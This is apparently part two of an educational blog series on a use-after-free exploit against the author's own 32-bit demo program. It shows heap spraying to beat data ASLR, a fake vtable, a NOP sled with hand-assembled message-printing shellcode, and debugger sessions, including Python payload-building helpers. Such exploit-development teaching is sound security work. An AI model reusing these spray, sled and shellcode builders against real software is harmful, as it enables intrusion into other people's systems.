Anatomy of a Modern Memory Corruption Exploit - Part II

Sun 09 April 2023

This is part two of a series of articles. Here is part one.

Step 2: Calling a pre-defined routine in the victim with ASLR enabled

In step 1 in the first article of this series we disabled ASLR so that the buffer for the decoded third chunk would sit at a fixed address. Now we will raise the bar for the exploit by enabling ASLR for data, that is, for memory on the stack and heap. We will keep ASLR disabled for code (by preventing GCC from creating a position-independent executable (PIE) with the -Wl,-no-pie compiler flag), so our routine pwned_destructor still lives at a fixed address.

So how can we defeat ASLR? We somehow need to find out the address of the third chunk’s buffer (because it contains the fake vtable), even though it is now a random value that differs from one invocation of the victim program to the next. We are helped here by the fact that we have a 32-bit program on our hands. As it turns out, with the somewhat limited address space of 32-bit programs (4GB), there are not that many addresses for the kernel to choose from, especially for large memory blocks. The plot below shows the address ranges (start and end addresses of the memory blocks) for different block sizes, as obtained by repeated invocations of a program that just calls malloc.

Figure 1. Address ranges returned by malloc by allocation size (with 14 random bits for mmap)

As you can see, if we allocate large enough blocks (100MB in the figure), all address ranges overlap to some extent. This means there is an address range that is guaranteed to be included in each and every memory block of that size. The actual size threshold above which this is the case depends on a kernel parameter (/proc/sys/vm/mmap_rnd_compat_bits), which tells the kernel how many random bits it should use for the mmap system call (mmap is used internally by malloc for large allocations). The default seems to be 8 bits (see this article for more details). With this value, a memory block of 100MB always gets allocated at the same address. To make things more interesting, I cranked up the value to 14 bits. With that value you get the behavior shown in the figure.
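The relation between the number of random bits and the required block size can be estimated with a bit of arithmetic. The following is only a rough sketch under simplifying assumptions that are not from the measurements above: a page size of 4 KiB, a start address chosen among 2^bits page-aligned positions, and no other allocations shifting the layout. The function names are made up for illustration.

```python
PAGE_SIZE = 4096          # assumed page size (4 KiB)
MIB = 1024 * 1024


def randomization_span(rnd_bits, page_size=PAGE_SIZE):
    """Approximate number of bytes over which a mapping's start address can vary."""
    return (1 << rnd_bits) * page_size


def guaranteed_overlap(block_size, rnd_bits, page_size=PAGE_SIZE):
    """Conservative size of the range that lies inside the block for every start address."""
    return max(0, block_size - randomization_span(rnd_bits, page_size))


if __name__ == "__main__":
    for bits in (8, 14):
        span = randomization_span(bits)
        fixed = guaranteed_overlap(100 * MIB, bits)
        print(f"{bits} random bits: start varies over {span // MIB} MiB, "
              f"stable part of a 100 MiB block: {fixed // MIB} MiB")
```

Under these assumptions, a block only contains a stable range once it is larger than the randomization span, which is why small allocations in the figure do not overlap.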

So how does this knowledge help us with the exploit? We need a large memory allocation (e.g. 100MB) to happen in the program and our fake vtable to be located at an address that is always included in the allocated memory block. This is actually quite easy to accomplish. In the previous step we put just one copy of the vtable in the third chunk. But we can make the third chunk much larger and put lots of copies of the vtable in it. Then, as pointer to the vtable (or, to be more precise, to one copy of it), we no longer use the start address of the buffer for the chunk’s data (which changes) but an address somewhere in the middle of this buffer (which stays the same). Because the buffer is located on the heap and we sort of "spray" data onto it, this technique is called heap spraying. However, as described here, it is only possible with 32-bit programs. Because 64-bit programs have a much larger address space (256 TB), it’s in general not possible to allocate memory blocks large enough to get overlapping address ranges. For them, this technique must be combined with a way to find out the program’s address space layout (at least partially), but this is beyond the scope of this series of articles. If I made you curious now, you can read more about this here for example.
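On the attacker’s side, building such a sprayed chunk could look roughly like the sketch below. It is not the actual exploit script: the function name is hypothetical, the address 0x0804a3dd is the one the debugger reports for pwned_destructor in this step, and base64 is used because the chunks are delivered base64-encoded. The demo uses a tiny size; the real chunk would be around 100MB.

```python
import base64
import struct

# Address of pwned_destructor as reported by the debugger in this article.
PWNED_DESTRUCTOR = 0x0804A3DD


def build_vtable_spray(entry_addr, size):
    """Return `size` bytes made of back-to-back little-endian 32-bit pointers."""
    if size % 4:
        raise ValueError("size must be a multiple of 4")
    return struct.pack("<I", entry_addr) * (size // 4)


# Tiny demo size so the example runs instantly.
spray = build_vtable_spray(PWNED_DESTRUCTOR, 4096)
encoded = base64.b64encode(spray)   # what would be sent as chunk data
```

Because every aligned 4-byte slot holds the same pointer, any aligned address inside the buffer can serve as the start of a "vtable".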

What a heap spray looks like in practice is shown in the debugger session below. We take a closer look at the first HTTPChunk object (which got overwritten) right before it’s about to be deleted.

Listing 1. Demo of the heap spraying
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177             delete p_chunk;

pwndbg> x/3dx p_chunk
0x98a3c40:      0xe9000000      0x78787878      0x78787878  (1)
pwndbg> x/16dx 0xe9000000
0xe9000000:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd  (2)
0xe9000010:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd
0xe9000020:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd
0xe9000030:     0x0804a3dd      0x0804a3dd      0x0804a3dd      0x0804a3dd
pwndbg> i sym 0x0804a3dd  (3)
pwned_destructor() in section .text of /home/consti/Programmieren/Exploits/uaf-overwrite-vtable

We can see (1) that the object’s pointer to its vtable now points to the address 0xe9000000. If we inspect the memory at this address we see (2) that it indeed contains pointers to the pwned_destructor routine (3), which make up the vtable. So where does this magic value 0xe9000000 come from? I found it by running the program a few times and choosing a value that was always included in the buffer for the third chunk (somewhere in the middle of it). It only needs to be aligned to a double-word (4-byte) boundary; then it’s bound to hit a vtable.
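Picking such a value by hand can also be expressed as a small calculation: intersect the buffer ranges observed over several runs and take an aligned address from the middle of the intersection. The sketch below illustrates the idea; the function name is hypothetical and the start addresses are made-up sample values, not measurements from the victim program.

```python
def pick_stable_address(starts, size, align=4):
    """Return an aligned address contained in every buffer [start, start + size)."""
    lo = max(starts)            # highest observed start address
    hi = min(starts) + size     # lowest observed end address (exclusive)
    if lo >= hi:
        raise ValueError("observed buffers do not overlap")
    mid = (lo + hi) // 2
    aligned = mid - (mid % align)
    if aligned < lo:
        aligned += align
    if aligned >= hi:
        raise ValueError("no aligned address inside the overlap")
    return aligned


# Hypothetical start addresses from three runs, 100 MiB buffer each.
observed = [0xE5F00010, 0xE6800010, 0xE7100010]
addr = pick_stable_address(observed, 100 * 1024 * 1024)
print(hex(addr))
```

Choosing the middle of the overlap rather than its edge leaves some margin in case a later run lands slightly outside the range seen so far.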

Step 3: Injecting the malicious code into the victim

So far, we haven’t injected any code (that we would control) into the program but used a routine already contained in the program. As I have mentioned, this is normally not a realistic scenario. So we will now ditch the routine and see how we can inject our own code.

First off, the injected code must of course be self-contained and position-independent, that is, it must be able to run from any location in memory and must not rely on anything other than system calls. This type of code is usually known as shellcode. The shellcode we will use looks like this:

Listing 2. Our shellcode
.code32
.intel_syntax noprefix  # the code below uses Intel syntax (GNU as defaults to AT&T)
jmp     l_data
l_code:
mov     ebx, 1      # file descriptor, 1 = stdout
pop     ecx         # pointer to buffer
mov     edx, 30     # buffer size
mov     eax, 4      # system call number, 4 = write
int     0x80        # invoke system call
ret

l_data:
call    l_code      # call to push the string's address onto the stack
.asciz  "\x1b[31mYou've been pwned!!!\x1b[0m\n"

The term shellcode is actually a bit misleading here as we don’t start a shell but just print a string. As you can see, the code is quite simple. First, it performs the JMP-CALL-POP trick: the CALL pushes the address of the string that follows it onto the stack (as its "return address"), and the POP then fetches that address into ECX. Then it invokes the write system call and returns (because it will be called as a method via the vtable). I translated the code into a raw binary (just the code, no headers and other stuff) using GNU as and objcopy so that the Python script that performs the exploit can use it.
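To make the JMP-CALL-POP layout more tangible, the following sketch assembles the same instruction sequence by hand in Python and computes the two relative displacements. It is an illustration only, not the way the binary for the exploit was produced; the function name and the fd parameter are introduced here for the example.

```python
import struct

MESSAGE = b"\x1b[31mYou've been pwned!!!\x1b[0m\n"   # 30 bytes, as in the listing


def build_shellcode(fd=1, message=MESSAGE):
    """Hand-assemble the JMP-CALL-POP shellcode for 32-bit x86 Linux."""
    body = (
        b"\xbb" + struct.pack("<I", fd)               # mov ebx, fd
        + b"\x59"                                     # pop ecx (string address)
        + b"\xba" + struct.pack("<I", len(message))   # mov edx, length
        + b"\xb8" + struct.pack("<I", 4)              # mov eax, 4 (write)
        + b"\xcd\x80"                                 # int 0x80
        + b"\xc3"                                     # ret
    )
    # jmp l_data: short jump over the body, relative to the end of the jmp
    jmp = b"\xeb" + struct.pack("<b", len(body))
    # call l_code: jump back to the body, relative to the end of the 5-byte call
    call = b"\xe8" + struct.pack("<i", -(len(body) + 5))
    return jmp + body + call + message + b"\x00"


shellcode = build_shellcode()
print(len(shellcode), shellcode[:2].hex())
```

Both displacements are relative to the instruction that follows, so the code contains no absolute address and runs wherever it ends up in memory.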

So how are we going to deliver this code to the victim program? We will use another chunk for that. But we again need to find a way to use a fixed start address (that we will put into the vtable), despite the start address of the chunk’s buffer being random. As you might have guessed, heap spraying, described in the previous step, comes to the rescue once more. But instead of putting lots of copies of our code into the chunk (as we did with the vtable), we will use a technique known as NOP slide (or NOP sled). You might be familiar with this technique if you know a bit about classical stack overflows. What it means is that we will create a large chunk (again 100MB), fill it almost completely with NOP instructions and put our shellcode at the very end of it. Then we will use an address that is guaranteed to be included in the chunk’s buffer as pointer to our code and put that address in our fake vtable. Unless we are unlucky enough to hit the few bytes of shellcode at the very end, this address will point to a NOP, and when the CPU finally jumps to it, program execution will "slide" down the NOPs until it reaches the shellcode. Note that we don’t care about null bytes in the shellcode as we don’t deliver it as a string but as base64-encoded data.
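Building the sled itself is straightforward. The sketch below shows one possible way to do it; the function name is hypothetical, and a single RET instruction stands in for the real shellcode so that the example stays self-contained. The demo size is tiny, whereas the real chunk would be around 100MB.

```python
import base64

NOP = b"\x90"   # x86 NOP instruction


def build_nop_sled(shellcode, total_size):
    """Fill a buffer of `total_size` bytes with NOPs and put the shellcode at its end."""
    if len(shellcode) > total_size:
        raise ValueError("shellcode does not fit into the requested size")
    return NOP * (total_size - len(shellcode)) + shellcode


placeholder = b"\xc3"                      # stand-in for the shellcode: a single ret
sled = build_nop_sled(placeholder, 64)     # tiny demo size
encoded_sled = base64.b64encode(sled)      # chunks are delivered base64-encoded
```

Placing the shellcode at the very end maximizes the number of addresses from which execution slides into it.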

In the following debugger session we will take a closer look at this fourth chunk containing the code.

Listing 3. Demo of the code injection
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177             delete p_chunk;

pwndbg> x/3dx p_chunk
0x8effc40:      0xe2000000      0x78787878      0x78787878  (1)
pwndbg> x/8dx 0xe2000000
0xe2000000:     0xdbc00000      0xdbc00000      0xdbc00000      0xdbc00000  (2)
0xe2000010:     0xdbc00000      0xdbc00000      0xdbc00000      0xdbc00000
pwndbg> x/8bx 0xdbc00000
0xdbc00000:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
pwndbg> x/8i 0xdbc00000
   0xdbc00000:  nop  (3)
   0xdbc00001:  nop
   0xdbc00002:  nop
   0xdbc00003:  nop
   0xdbc00004:  nop
   0xdbc00005:  nop
   0xdbc00006:  nop
   0xdbc00007:  nop
pwndbg> x/12i (0xd9b52010 + 0x6400000 - 60)
   0xdff51fd4:  nop
   0xdff51fd5:  nop
   0xdff51fd6:  nop
   0xdff51fd7:  jmp    0xdff51fec  (4)
   0xdff51fd9:  mov    ebx,0x1
   0xdff51fde:  pop    ecx
   0xdff51fdf:  mov    edx,0x1e
   0xdff51fe4:  mov    eax,0x4
   0xdff51fe9:  int    0x80
   0xdff51feb:  ret
   0xdff51fec:  call   0xdff51fd9
   0xdff51ff1:  sbb    ebx,DWORD PTR [ebx+0x33]
pwndbg> x/1s 0xdff51ff1
0xdff51ff1:     "\033[31mYou've been pwned!!!\033[0m\n"  (5)

But before we look at the fourth chunk, note that our overwritten object still contains a pointer to the chunk containing our fake vtables (1), although with a different value than before (0xe2000000 instead of 0xe9000000). And of course the vtable looks different now as well. It contains pointers with the value 0xdbc00000 (2). So what is there at this address? If we display the memory as instructions (3) we see lots of NOPs. So it seems the address is located somewhere in the buffer for the decoded fourth chunk, in the NOP slide. If we examine the end of this buffer (0xd9b52010 is the start address of the buffer, conveniently printed out by the program) we find our shellcode (4) together with the string it prints (5).
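The addresses in this session can be cross-checked with a few lines of arithmetic. All values below are copied from the listing; only the variable names are made up.

```python
BUF_START = 0xD9B52010        # start of the fourth chunk's buffer
BUF_SIZE = 0x6400000          # 100 MiB
VTABLE_ENTRY = 0xDBC00000     # pointer stored in the fake vtable
SHELLCODE_START = 0xDFF51FD7  # address of the jmp instruction at (4)

buf_end = BUF_START + BUF_SIZE

# The vtable entry must point into the buffer, in front of the shellcode.
assert BUF_START <= VTABLE_ENTRY < SHELLCODE_START < buf_end

shellcode_len = buf_end - SHELLCODE_START        # bytes from the jmp to the buffer end
nops_to_slide = SHELLCODE_START - VTABLE_ENTRY   # NOPs executed before the jmp

print(hex(buf_end), shellcode_len, hex(nops_to_slide))
```

The shellcode ends exactly at the end of the buffer, and the CPU has to execute tens of megabytes of NOPs before it gets there.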

I arrived at these two addresses (0xe2000000 and 0xdbc00000) again by running the program a few times and choosing values that were always included in the respective buffers. Interestingly, the buffer for the fourth chunk was always located 100MB below the buffer for the third chunk. The following diagram shows the locations of the chunks’ buffers in memory and their relation (what points to what).

Figure 2. Location of the chunk buffers in memory and their relation

So when the destructor is finally called on the overwritten object, via the pointer in the vtable, the CPU will jump right into the NOP slide, execute all the NOPs until it reaches the shellcode and then the shellcode itself.

Except… it doesn’t, not yet at least. Instead, the program terminates with a segmentation fault. Why is that? Another security measure employed by modern CPUs and operating systems keeps us from succeeding. It is commonly known as data execution prevention (DEP) or W^X and means that any memory regions that are writeable by a program (on the heap or stack) are by default not executable (implemented via the NX bit). As the chunk’s buffer is of course writeable, the CPU will not execute the code in it but generate an exception which leads in turn to the segmentation fault.
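On Linux, the permissions of each memory region of a process are listed in /proc/<pid>/maps, which makes it easy to check the W^X rule. The sketch below parses one line in that format; the helper names are made up, and the sample line is reconstructed from the address range of the chunk buffer’s mapping in this article rather than copied from a real maps file.

```python
def parse_maps_line(line):
    """Split a /proc/<pid>/maps line into (start, end, permissions)."""
    fields = line.split()
    start_s, end_s = fields[0].split("-")
    return int(start_s, 16), int(end_s, 16), fields[1]


def is_executable(perms):
    return "x" in perms


def violates_wx(perms):
    """True if a region is writeable and executable at the same time."""
    return "w" in perms and "x" in perms


# Reconstructed sample line for the anonymous mapping holding the chunk buffers.
sample = "d9b52000-f6e00000 rw-p 00000000 00:00 0"
start, end, perms = parse_maps_line(sample)
print(hex(start), hex(end), perms, is_executable(perms))
```

A region marked rw-p, like the one above, can hold our bytes but will fault as soon as the CPU tries to fetch instructions from it.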

So how can we get around this security measure? In the third part of this series I will show you a very clever technique that works by not injecting code into the program but something else. But for now, we will just play a bit unfair and change the permissions of the chunk’s buffer. This can be done very easily in the debugger as you can see below.

Listing 4. Changing the permissions of the chunk’s buffer
pwndbg> vmmap 0xd9b52010  (1)
     Start        End Perm     Size Offset File
0xd9b52000 0xf6e00000 rw-p 1d2ae000      0 [anon_d9b52] +0x0
pwndbg> call (long) mprotect(0xd9b52000, 0x1d2ae000, 0x7)  (2)
$4 = 0

First I use the vmmap command (provided by the pwndbg extension) to check the permissions of the buffer (1), and you can see that it’s indeed not executable (it lacks the "x" bit). Then I call the mprotect system call (2) to change the permissions. I don’t pass the start address and size of the buffer but those of the complete memory mapping, and 0x7 means "rwx". After that the exploit actually works.
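Using the complete mapping is the convenient option because mprotect requires a page-aligned start address, and the buffer itself starts 0x10 bytes into a page. As an alternative, the arguments for just the buffer could be computed as in the following sketch, which assumes a 4 KiB page size and uses the Linux values of the PROT_* constants; the function name is hypothetical.

```python
# Values of the protection flags from <sys/mman.h> on Linux.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
PAGE_SIZE = 4096   # assumed page size


def page_aligned_range(addr, length, page_size=PAGE_SIZE):
    """Return (start, size) of the smallest page-aligned range covering the buffer."""
    start = addr & ~(page_size - 1)                               # round down
    end = (addr + length + page_size - 1) & ~(page_size - 1)      # round up
    return start, end - start


prot = PROT_READ | PROT_WRITE | PROT_EXEC
start, size = page_aligned_range(0xD9B52010, 0x6400000)
print(f"mprotect({start:#x}, {size:#x}, {prot:#x})")
```

The rounding adds one extra page at the end because the buffer’s last bytes spill over a page boundary.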

This is the end of the second article in this series. As I already said, we will defeat W^X in the third article. Stay tuned if you liked it so far…